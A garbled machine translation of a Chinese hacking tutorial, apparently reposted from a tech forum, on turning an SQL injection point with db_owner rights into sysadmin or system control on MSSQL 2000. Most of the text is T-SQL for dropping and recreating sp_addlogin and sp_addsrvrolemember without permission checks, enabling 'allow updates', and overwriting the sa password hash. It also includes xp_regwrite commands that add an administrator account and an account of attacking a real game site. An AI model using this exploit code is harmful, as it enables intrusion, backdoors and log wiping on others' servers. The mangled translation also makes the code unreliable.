2. Tech
  3. SQL INJECTION UE Utilization Method

SQL INJECTION UE Utilization Method

xiaoxiao2021-03-06  14

---- Just give me a injection point, no matter what permissions, I will give you a Webshell or even system permission statement: This article is for teaching purposes only, if the attack consequences of this article are not responsible. Because of the fact that it is too harmful, the original text has been deleted and modified, even if the harmfulness of this article is still large, please do not do any destructive operations for the domestic site. Considering the thirty, even decided to send it. The means of this trick, the use range is wide, it can be said that as long as there is a website with SQL injection vulnerability, just apply 99% of this method to get Webshell or even system privileges (do not dare to say full, huh, huh, he has hundreds of truths "Practical exercise", basically 100% can get WebShell or even system privileges). I remember that I wrote a method that uses XP_REGWRITE to obtain system privileges in "MSSQL DB_OWNER Role Inject Directions (Continued)": XP_REGWRITE 'HKEY_LOCAL_MACHINE', 'Software / Microsoft / Windows / CurrentVers Ion / Run', 'XWQ1 ',' REG_SZ ',' net user xwq xwq / add'xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE / Microsoft / Windows / currentvers ion / run', 'xwq2', 'REG_SZ', 'net localgroup administrators xwq / add', as long as Let the server where the site is restacked, you can get system authority. After hundreds of true experiments, this method is not practical, it is easy to cause the network management's attention, and then DDOS is also illegal things (even good people), launch a lot of manpower, material resources, material resources ( Look at your broiler how much it is. So not feasible (unless you want to get it very much). Oh, so much, you may see it is not impatient, good, this introduces one of my three must-killing techniques --- 万 提 提.

If there is a website exists in SQL injection vulnerability, if this website is a user who uses the user of the fixed server sysadmin authority (huh, the popular point is SA, the rookie can think so), huh, I want to get a WebShell or system authority. It is easy to make a lifetime, as far as I know, sysadmin authority should get 10 kinds of WebShell or system privileges, huh, maybe more (even 10 kinds), how to get Webshell or system privilege, I I don't want to say more, I want to be sharpened than everyone, but if a website is DB_OWNER permission? What do you do, how do you take system privileges, how to take WebShell (no upload vulnerabilities and database backups), everyone may return backup a shell, I remember that LCX also said in "MSSQL DB_OWNER role injecting system permissions" "The shell" backup shell is just the theoretical stuff, if a WebShell has 20MB, can you use it? "Oh, if I tell you that DB_OWNER gets a WebShell or system permission method and sysadmin privileges. More, what is your reflection? Is it a bit incredible, or I said? (Do not believe in friends, don't look at it below) Oh, is it tips itchy, can't wait to know, good, I am not talking, this will put my three major killing skills. --- Universal improvement permission method tells everyone. Before telling everyone, let's take an experimental environment WindowsXP SP1 SQL 2000 SP3, everyone follows me to Step to Step, first create a user with DB_OWNER, here I am XWQ (就 是 Do nothing in the server role Select, hook DB_OWNER in the database role), ok, now we open the query analyzer with XWQ, enter sp_addlogin xuwenqiang, execute it, what to pull? Server: Message 2571, Level 14, State 2, Procedure SP_ADDLOGIN, line 16 User 'XWQ' No permissions of DBCC Auditevent. Server: Message 15247, Level 16, State 1, Process SP_ADDLOGIN, Row 17 The user does not perform the permissions of this operation.

Oh, the above error message appears, this is normal, because only the members of the sysadmin and securityadmin fixed server roles can perform sp_addlogin, so how can I make sp_addlogin? Here we look at the sp_addlogin code: create procedure sp_addlogin @ loginame sysname, @ passwd sysname = Null, @ defdb;; sysname = 'master' - UNDONE: DEFAULT CONFIGURABLE ???, @ deflanguage sysname = Null, @ sid varbinary (16) = Null, @ encryptopt varchar (20) = NullAS-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --set nocount onDeclare @ret int - return value of sp call-- CHECK PERMISSIONS --IF (not is_srvrolemember ( 'securityadmin ') = 1) Begindbcc Auditevent (104, 1, 0, @loginame, null, null, @sid) Raiserror (15247, -1, -1) Return (1) endelsebegindbcc Auditevent (104, 1, 1, @loginame, NULL, NULL, @SID) END - Disallow User Transaction --Set Implicit_Transactions Offif (@@ TRANCOUNT> 0) Beginraiserror (15002, -1, -1, 'sp_addlogin') Return (1) End - Validate Login Name AS : - (1) Valid SQL Name (SQL Login) - (2) No Backslash - (3) Not a reserved login nameexecute @ret = sp_validname @loginameif (@ret <> 0) Return ( 1) IF (Charindex ('/', @loginame> 0) Begin Raiserror (15006, -1, -1, @ loginame) RETU RN (1) end - NOTE: DIFFERENT CASE SA IS ALLOWED.IF (@loginame = 'sa' or lower (@loginame) in ('public')) Beginraiserror (15405, -1, -1, @loginame) Return (1) End - login name must not already exist - IF exists (select * from master.dbo.syslogins where loginname = @loginame) Beginraiserror (15025, -1, -1, @ loginame) Return (1) end- - Validate Default Database - IF DB_ID (@Defdb) Is Nullbeginraiserror (15010, -1, -1, @

defdb) return (1) end-- VALIDATE DEFAULT LANGUAGE --IF (@deflanguage IS NOT Null) beginExecute @ret = sp_validlang @deflanguageIF (@ret <> 0) return (1) endELSEbeginselect @deflanguage = name from master.dbo. syslanguageswhere langid = @@ default_langid --server default languageif @deflanguage is nullselect @deflanguage = N'us_english'end-- VALIDATE SID IF GIVEN --if ((@sid IS NOT Null) and (datalength (@sid) <> 16 )) Beginraiserror (15419, -1, -1) RETURN (1) endelse if @Sid is nullselect @sid = newid () IF (SUSER_SNAME (@SID) IS Not NULL) Beginraiserror (15433, -1, -1) Return (1) end-- VALIDATE AND USE ENCRYPTION OPTION --declare @xstatus smallintselect @xstatus = 2 - accessif @encryptopt is nullselect @passwd = pwdencrypt (@passwd) else if @encryptopt = 'skip_encryption_old'beginselect @xstatus = @xstatus | 0x800, - Old-Style Encryption @ passwd = Convert (sysname, convert (varbinary (30), Convert (varchar (30), @passwd)) endelse if @Encryptopt <> 'Skip_encryption'beginraiserror (15600, -1 , -1, 'sp_addlogin') Return 1e ND - Attempt the insert of the new login --insert @xstatus, getdate (), getdate (), @loginame, control (varbinary (256), @Passwd, @SID, @XSTATUS, GETDATE () , Db_id (@defdb), @Deflanguage) if @@ error <> 0 - this indeicates we cut duplicate row return (1) - Update Protection TimeStamp for master DB, To Indicate Syslogins Change --Exec ('Use master grant " All to null '

- Finalization: Return Success / Failure --raiserror (15298, -1, -1) RETURN (0) - SP_ADDLogingo is only a member of Sysadmin and SecurityAdmin fixed server roles to execute sp_addlogin, mainly here to make a ghost - Check permissions - IF ('securityadmin') = 1) Begindbcc Auditevent (104, 1, 0, @Loginame, Null, Null, @SID) Raiserror (15247, -1, -1) Return (1 EndelseBegindBCC Auditevent (104, 1, 1, @Loginame, NULL, NULL, @SID) END As long as we cut this code, any permissions can increase user pull.

Well, we first pull-drop procedure sp_addlogin sp_addlogin deleted and then restored again sp_addlogincreate procedure sp_addlogin @ loginame sysname, @ passwd sysname = Null, @ defdb;; sysname = 'master' - UNDONE: DEFAULT CONFIGURABLE ???, @ deflanguage sysname = Null, @ sid varbinary (16) = null, @ encryptopt varchar (20) = NULLAS - Setup runtime options / declare variables --set noCount Ondeclare @ret Int - Return Value of SP Call - Disallow User Transaction --set Implicit_Transactions Offif (@@ TRANCOUNT> 0) Beginraiserror (15002, -1, -1, 'sp_addlogin') Return (1) End-- Validate login name as: - (1) Valid SQL Name (SQL login) 2) No backslash - (3) Not a reserved login nameexecute @ret = sp_validname @loginameif (@ret <> 0) Return (1) IF (Charindex ('/', @loginame)> 0)> 0) Begin Raiserror (15006, -1, -1, @ loginame) Return (1) end - NOTE: DIFFERENT CASE SA IS Allowed.if (@Loginame = 'sa' or lower (@loginame) in ('public')) Beginraiserror (15405, -1, -1, @Loginame) Return (1) end-- login name must not already exist --i f exists (select * from master.dbo.syslogins where loginname = @loginame) beginraiserror (15025, -1, -1, @ loginame) return (1) end-- VALIDATE DEFAULT DATABASE --IF db_id (@defdb) IS NULLbeginraiserror (15010, -1, -1, @ DEFDB) RETURN (1) end - validate default language - IF (@Deflanguage is not null) Beginexecute @ret = sp_validlang @deflanguageif (@ret <> 0) Return (1) EndelseBeginselect @deflanguage = name from master.dbo.syslanguageeswhere langid = @@ default_langid --server default languageif @deflanguage is nullselect @

Deflanguage = N'US_ENGLISH'END - Validate Sidiff Given - IF ((@SID IS NT NULL) AND (DATALENGTH (@SID) <> 16)) Beginraiserror (15419, -1, -1) Return (1) Endelse if @Sid = newid () IF (SUSER_SNAME (@SID) IS NULL) Beginraiserror (15433, -1, -1) RETURN (1) end - validate and use encryption option - Declare @xstatus smallintselect @xstatus = 2 - accessif @encryptopt is nullselect @passwd = pwdencrypt (@passwd) else if @encryptopt = 'skip_encryption_old'beginselect @xstatus = @xstatus | 0x800, - old-style encryption @ passwd = convert (sysname, Convert (Varbinary (30), Convert (VARCHAR (30), @Passwd)) endelse if @Encryptopt <> Skip_encryption'beginraiserror (15600, -1, -1, 'sp_addlogin') Return 1END - Attempt the insert of The New Login - INSERT INTO MASTER.DBO.SYSXLOGINS VALUES (NULL, @SID, @xstatus, getdate (), getdate (), @Loginame, Convert (Varbinary (256), @passwd, db_id (@Defdb), @DEFLANGUAGE) IF @@ error <> 0 - this INDICES WE SAW DUPLICATE ROW RETURN (1) - Update Protection Timesta MP for master db, to indeicate syslogins change --Exec ('use master grant all to null') - Finalization: Return Success / Failure --raiserror (15298, -1, -1) RETURN (0) - sp_addlogingo I only increase the user pull, OK, I'm entering sp_addlogin xuwenqiang, executes a new login in the Query Analyzer in the Query Analyzer.

I created a user Xuwenqiang, of course, this user is not white, I want to turn him into a maximum authority, of course, the highest permission in SQL is sysadmin, and turn a user into sysadmin only sp_addsrvrolememberMber This storage process is pulled, but only sysadmin privileges are used, unhappy, even let him use it for me, huh, huh, smart readers must think about how to let me only have DB_OWNER privilege, how to use sp_addsrvroleMemember pull, yes , and let sp_addlogin the same as the method I used, as long as permission to remove some restrictions sp_addsrvrolemember, we can add any sysadmin pull, we take a look at sp_addsrvrolemember code: create procedure sp_addsrvrolemember @ loginame sysname, - login name @ rolename sysname = NULL - server role nameas-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --set nocount ondeclare @ret int, - return value of sp call @rolebit smallint, @ismem int-- DISALLOW USER TRANSACTION --set implicit_transactions offIF (@ @trancount> 0) beginraiserror (15002, -1, -1, 'sp_addsrvrolemember') return (1) end-- VALIDATE SERVER ROLE NAME, CHECKING PERMISSIONS --select @ismem = is_srvrolemember (@rolename) if @ismem is nullbegindbcc auditevent (108, 1, 0, @loginame, null, @ropename, NULL) Raiserror (15402, -1, -1, @ropename) Return (1) endif @isMem = 0BEGINDBCC AUDITEVENT (108, 1, 0, @Loginame, Null, @roleName, NULL) RAISERROR (15247, -1, -1) RETURN (1) end - audit a successful security check --dbcc auditevent (108, 1, 1, @loginame, null, @RoleName , NULL) - Cannot Change Sa Roles - IF @LoginaMe = 'Sa'begin Raiserror (15405, -1, -1, @Loginame) Return (1) end - Obtain the bit for this role --Select @Rolebit = Case @roleName when 'sysadmin' Ten 16 When 'securityAdmin' Ten 32 when 'ServerAdmin' Ten 64 When 'setupadmin'

THEN 128 WHEN 'processadmin' THEN 256 WHEN 'diskadmin' THEN 512 WHEN 'dbcreator' THEN 1024WHEN 'bulkadmin' THEN 4096 ELSE NULL END-- ADD ROW FOR NT LOGIN IF NEEDED --if not exists (select * from master.dbo. syslogins where loginname = @loginame) begin execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame if (@ret <> 0) begin raiserror (15007, -1, -1, @ loginame) return (1) endend-- UPDATE ROLE MEMBERSHIP --update master.dbo.sysxlogins set xstatus = xstatus | @rolebit, xdate2 = getdate () where name = @loginame and srvid IS NULL-- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, tO INDICATE SYSLOGINS CHANGE --exec ( 'use master grant all to Null ') Raiserror (15488, -1, -1, @ loginame, @ ROLENAME) - Finalization: Return Success / Failurereturn (@@ Error) - sp_addsrvroleMembergo Remove this Segment - Validate Server Role Name, Checking Permissions Select @ismem = is_srvrolemember (@roleName) if @ismem is nullbegindbcc Auditevent (108, 1, 0, @loginame, null, @ropename, null) Raiserror (15402, -1, -1, @Rolena Me) Return (1) endif @ismem = 0begindbcc Auditevent (108, 1, 0, @Loginame, Null, @roleName, NULL) RAISERROR (15247, -1, -1) RETURN (1) END This can be arbitrarily increased Sysadmin pull, huh, cool. Enter sp_addsrvrolemember xuwenqiang, sysadmin, yeah !!!!!!! successfully pulled in the query analyzer. Here, we successfully use users who have only DB_OWNER privileges to create a newly-supreme permission in SQL, which is user XuwenQiang with sysadmin privilege, there is a syshell or system permission is not easy! Don't just put your eyes only on the two stored procedures I said, if only sysadmin is useless, we can use my universal proponentity.

For example: sp-configure, sp_addlinkedServer, sp_addlinkedsrvlogin, sp_makewebtask, etc. A lot of SYSADMIN permissions can be used, we can make them use me. Let's take an example of a universal rights to create a back door that will never be killed and perfect. We all know that there is a hacker called the back door in SQL, that is, SA, sa is built-in administrator login And you cannot make changes and delete. Oh, this is M $ saying, if you have seen another article I wrote, "completely delete SA this back door", it is also known that the SA is also deleted. We know that there is sp_password in SQL can change the password, but we must know the old password of the user to change, can you change, then there is no way to change the SA password without knowing the old password? Yes, in fact, the functionality of sp_configure, sp_configure is to display or change the global configuration settings for the current server. SP_CONFIGURE (Change Configuration Options) is permitted by default awarding sysadmin and serveradmin fixed server roles. This is easy to remove the permissions in sp_configure to check the permissions, and then rebuild, we will use it.

CREATE PROCEDURE sp_configure --- 1996/08/14 09: 43 @ configname varchar (35) = NULL - option name to configure, @ configvalue int = NULL - new configuration valueasset nocount ondeclare @ confignum int --Num of the opt to be configured, @ configcount int --Num of options like @ configname, @ show_advance int --Y / N Read & Write actions on "advanced" optsdeclare @fullconfigname varchar (35) declare @prevvalue int / *** Determine @maxnumber based on . advance option in syscurconfigs * / if (select value from master.dbo.syscurconfigs where config = 518) = 1select @show_advance = 1 - Display advanced optionselseselect @show_advance = 0 - Do not display advanced options / *** Make certain that max user info. reflects any addpak upgrades. * / if (select high from master.dbo.spt_values ​​where number = 103 and type = 'C') <> @@ max_connectionsupdate master.dbo.spt_values ​​set high = @@ max_connections Where number = 103 and type = 'c' / *** if no option name is given, The Procedure W ill just print out all the ** options and their values. * / if @configname is NULLbegin select name, minimum = low, maximum = high, config_value = c.value, run_value = master.dbo.syscurconfigs.value from master.dbo .SPT_VALUES, MASTER.DBO.SYSCONFIGURES C, MASTER.DBO.SYSCURCONFIGS WHERE TYPE = 'c' and number = c.syscurconfigs.dbo.syscurconfigs.config and ((C.Status & 2 <> 0 and @ Show_advance = 1) OR (C.Status & 2 = 0)) Order by Lower (Name) Return (0) end / *** use @

configname and try to find the right option. ** If there is not just one, print appropriate diagnostics and return. * / select @configcount = count (*), @fullconfigname = min (v.name), @prevvalue = min (C.Value) from master.dbo.spt_values ​​v, master.dbo.sysconfigure cwhere v.name like '%' @configname '%' and v.type = 'c' and v.number = c.config and v.number = c.config ((C.Status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0)) / *** if no option, show the user what the Options are. * / if @configcount = 0begin Raiserror (15123, -1, -1, @ configname) Print '' Raiserror (15456, -1, -1) / * ** Show the user what the Options area. * / select name, minimum = low, maximum = high , config_value = c.value, run_value = master.dbo.syscurconfigs.value from master.dbo.spt_values, master.dbo.sysconfigures c, master.dbo.syscurconfigs where type = 'C' and number = c.config and number = Master.dbo.syscurconfigs.config and (C.Status & 2 <> 0 and @show_advance = 1) OR (C.STAT US & 2 = 0) RETURN (1) end / *** if More Than Option Like @configname, Show the duplicates and returnfigname, show the duplicates and returnfigname, Show the duplicates and return. * / if @configcount> 1begin Raiserror (15124, -1, -1, @ configname ) Print '' SELECT DUPLICATE_OPTIONS = Name from master.dbo.spt_values, master.dbo.sysconfigures c where name limited '%' @configname '%' and type = 'c' and number = c.config and ((C) .status & 2 <> 0 and @Show_advance = 1) OR (C.Status & 2 =

. 0)) return (1) endelse / * There must be exactly one, so get the full name * / select @configname = name -, @ value_in_sysconfigures = c.value from master.dbo.spt_values, master.dbo.sysconfigures c where name like '%' @configname '%' and type = 'c' and number = c.config and ((C.Status & 2 <> 0 and @show_advance = 1) OR (C.Status & 2 = 0) / *** if @configvalue is null, just show the current state of the option. * / If @configvalue is nullbeginselect v.name, v.low as 'minimum', v.high as 'maximum', c.value as 'config_value', u.value as 'run_value' from master.dbo.spt_values ​​v left outer join master.dbo.sysconfigures c on v.number = c.config left outer join master.dbo.syscurconfigs u on v .Number = u.config where v.type = 'c' and v.name like '%' @configname '%' and (C.STATUS & 2 <> 0 and @show_advance = 1) OR (c. Status & 2 = 0)) RETURN (0) end / *** now get the configuration number. * / select @confignum = numberfrom master.dbo.spt_values, master.dbo.sysconfigures cwhere type = 'C' and (@configvalue between low and high or @configvalue = 0) and name like '%' @configname '%' And number = c.config and (C.Status & 2 <> 0 and @show_advance = 1) OR (C.Status & 2 =

0) / *** if this is the number of default language, we want to make sure ** That the new value is a valid language id in syslanguages. * / If @Confignum = 124beginif NOTS (SELECT * from master. DBO.SYSLANGUAGES where langid = @configvalue) Begin / * 0 Is Default Language, US_ENGLISH * / IF @ConfigValue <> 0 Begin Raiserror (15127, -1, -1) RETURN (1) end end / *** if this is IS the number of kernel language, we want to make sure ** that the new value is a valid language id in syslanguages. * / if @confignum = 132beginif not exists (select * from master.dbo.syslanguages ​​where langid = @configvalue) begin / * 0 Is Default Language, US_ENGLISH * / IF @ConfigValue <> 0 Begin Raiserror (15028, -1, -1) RETURN (1) end end / *** "user options" Should Not try to set incompatible options / value * / if @confignum = 1534 - "User Options" Beginif (@configvalue & (1024 2048) = (1024 2048)) --ansi_null_default_on / off begin raiserror (15303, -1, -1, @ configValue)Return (1) Endend / *** although the @configname is good. * / if @confignum is NullBeginraiserror (15129, -1, -1, @ configValue, @ configname) Return (1) end -. Msg 15002, but in 6.5 allow this inside a txn (not check @@ trancount) # 12828 ./*** Now update sysconfigures * / update master.dbo.sysconfigures set value = @configvaluewhere config = @ confignum / *** Flush the procedure cache -. this is to account for options which become ** effective immediately (. ie dont need a server restart) * / dbcc freeproccacheraiserror (15457, -1, -1, @fullconfigname, @prevvalue, @

ConfigValue) with logreturn (0) - sp_configuregook, we sp_configure 'allow updates', 1Goreconfigure with overridego, so we can change the password of the SA. Next update sysxlogins set password = 0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A 1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid = 0x01, such sa password was changed we pull pull 111111. Oh, the solution to the solution is to delete the sa. How to delete I can refer to my "completely delete SA this back door". Example: The following is a good-time attack test of a domestic and very famous site to make a probably verification of the above knowledge. For many factors, we call this site is www. ** 173.com. Www. ** 173.com This site is very famous on the game, ranking 20 (when I test), here I don't want to say how I found the injection point, everyone can still find it, still more (The whole test can really spend a lot of time, don't misunderstand, I don't say time spend "testing", but put it in the write program, don't write like a sample, how to make me what you want? • The whole attack is only 10 minutes.

In the found injection point GameType = ** (depressed, if there is NBSI2 when testing, it is easy to be relaxed), first enter Drop Procedure SP_ADDLOGIN, then entered in IE (Oh, I certainly write the program I wrote inside input puller) create procedure sp_addlogin @ loginame sysname, @ passwd sysname = Null, @ defdb;; sysname = 'master' - UNDONE: DEFAULT CONFIGURABLE ???, @ deflanguage sysname = Null, @ sid varbinary (16) = Null , @ encryptopt varchar (20) = NullAS-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --set nocount onDeclare @ret int - return value of sp call-- DISALLOW USER TRANSACTION --set implicit_transactions offIF (@@ trancount> 0) beginraiserror (15002, -1, -1, 'sp_addlogin') Return (1) end - validate login name as: - (1) Valid SQL Name (SQL Login) - (2) No backslash - - (3) Not a reserved login nameexecute @ret = sp_validname @Loginameif (@ret <> 0) Return (1) IF (Charindex ('/', @Loginame> 0) Begin Raiserror (15006, -1, -1 , @ loginame) Return (1) end - NOTE: DIFFERENT CASE SA IS ALLOWED.IF (@loginame = 'sa' or lower (@loginame) in ('public')) Beginraiserror (15405, -1, -1, @Loginame) Return ( 1) End-- login name must not already exist - IF exists (select * from master.dbo.syslogins where loginname = @loginame) Beginraiserror (15025, -1, -1, @ loginame) Return (1) end-- VALIDATE DEFAULT DATABASE --IF db_id (@defdb) IS NULLbeginraiserror (15010, -1, -1, @ defdb) return (1) end-- VALIDATE DEFAULT LANGUAGE --IF (@deflanguage IS NOT Null) beginExecute @ret = sp_validlang @Deflanguageif (@RET <> 0) Return (1) endelsebeginselect @deflanguage = name from master.dbo.syslanguageeswhere langid = @

@default_langid --server default languageif @deflanguage is nullselect @deflanguage = N'us_english'end-- VALIDATE SID IF GIVEN --if ((@sid IS NOT Null) and (datalength (@sid) <> 16)) beginraiserror ( 15419, -1, -1) RETURN (1) endelse if @SID is nullselect @sid = newid () ing (SUSER_SNAME (@SID) IS NULL) Beginraiserror (15433, -1, -1) RETURN (1) End - VALIDATE AND USE ENCRYPTION OPTION --declare @xstatus smallintselect @xstatus = 2 - accessif @encryptopt is nullselect @passwd = pwdencrypt (@passwd) else if @encryptopt = 'skip_encryption_old'beginselect @xstatus = @xstatus | 0x800, - - Old-Style Encryption @ Passwd = Convert (Sysname, Convert (Varbinary (30), Convert (varchar (30), @passwd)) endelse if @Encryptopt <> Skip_encryption'beginraiserror (15600, -1, -1, 'sp_addlogin') Return 1END - Attempt the insert of the new login --insert Into Master.dbo.sysxlogins Values ​​(Null, @SID, @xstatus, getdate (), getdate (), @loginame, Convert (Varbinary (256 ), @passwd), @Deflanguage) if @@ error <> 0 - thi s indicates we saw duplicate row return (1) - UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --exec ( 'use master grant all to null') - FINALIZATION: RETURN SUCCESS / FAILURE --raiserror (15298, -1, -1) return (0) - sp_addloginGOOK, our new user exec master..sp_addlogin xwq then drop procedure sp_addsrvrolemember, and then enter the create procedure sp_addsrvrolemember @ loginame sysname in IE, - login name @ rolename sysname = NULL - Server role names - setup runtime options / declare variables --set nocount ondeclare @

ret int, - return value of sp call @rolebit smallint, @ismem int-- DISALLOW USER TRANSACTION --set implicit_transactions offIF (@@ trancount> 0) beginraiserror (15002, -1, -1, 'sp_addsrvrolemember') return ( 1) End - Cannot Change Sa Roles - IF @loginame = 'Sa'begin Raiserror (15405, -1, -1, @Loginame) Return (1) end - Obtain the bit for this role --Select @Rolebit = CASE @rolename WHEN 'sysadmin' THEN 16 WHEN 'securityadmin' THEN 32 WHEN 'serveradmin' THEN 64 WHEN 'setupadmin' THEN 128 WHEN 'processadmin' THEN 256 WHEN 'diskadmin' THEN 512 WHEN 'dbcreator' THEN 1024WHEN 'bulkadmin' THEN 4096 ELSE NULL END-- ADD ROW FOR NT LOGIN IF NEEDED --if not exists (select * from master.dbo.syslogins where loginname = @loginame) begin execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame if (@ret <> 0) begin Raiserror (15007, -1, -1, @ loginame) Return (1) endnd- Update Role Membership --Update master.dbo.sysxlogins set xstatus = xstatus | @Rolebit, x Date2 = getdate () Where name = @loginame and srvid is null - Update Protection TimeStamp for Master DB, TO INDICATE SYSLOGINS CHANGE --EXEC ('Use master grant all to null') raiserror (15488, -1, -1, @ loginame, @ rolename) - FINALIZATION: RETURN sUCCESS / FAILUREreturn (@@ error) - sp_addsrvrolememberGO followed exec master..sp_addsrvrolemember xwq, sysadmin we take comprehensive utilization sql query tool or even look at the analyzer, huh, success To pull so that we will build a user with the highest permissions on the server. We want everyone to go back. Oh, because just safety test, I didn't go deep into, delete the account, clear the log, and the flash.

转载请注明原文地址:https://www.9cbs.com/read-47751.html

9cbs

New Post(0)